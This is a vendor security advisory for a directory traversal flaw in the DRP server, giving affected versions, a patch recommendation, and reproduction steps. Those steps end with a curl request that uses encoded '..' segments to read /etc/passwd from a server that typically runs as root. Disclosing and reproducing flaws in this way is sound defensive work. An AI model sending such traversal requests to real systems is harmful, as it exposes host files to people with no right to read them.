7.1. CVE 20200924a: Web requests can navigate outside of DRP controlled areas¶
DRP server incorrectly respects using .. for navigation if resulting path is outside of managed areas. This potentially allowed bad actors to access the host file system.
Classification: Directory Traversal
Reported: Sept 24, 2020
Fixed: Sept 24, 2020
Addressed In: v4.5, v4.4.7, v4.3.8, v4.2.17
7.1.1. Recommendation¶
Users are advised to apply this patch as soon as possible. Patching involves replacing the DR-SERVER binary that closes matches the currently deployed version.
7.1.2. Mitigation¶
Code was added to prevent out of bounds navigation.
7.1.3. Steps to reproduce¶
docker run --rm -it ubuntu /bin/bash apt update && apt install -y curl cd /opt mkdir drp ; cd drp curl -fsSL get.rebar.digital/stable | bash -s -- --isolated install ./dr-provision --base-root=`pwd`/drp-data --local-content="" --default-content="" > drp.log 2>&1 & curl -k https://127.0.0.1:8092/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
The above results on the contents of /etc/passwd being shown. This is particularly bad given that this application generally runs as root.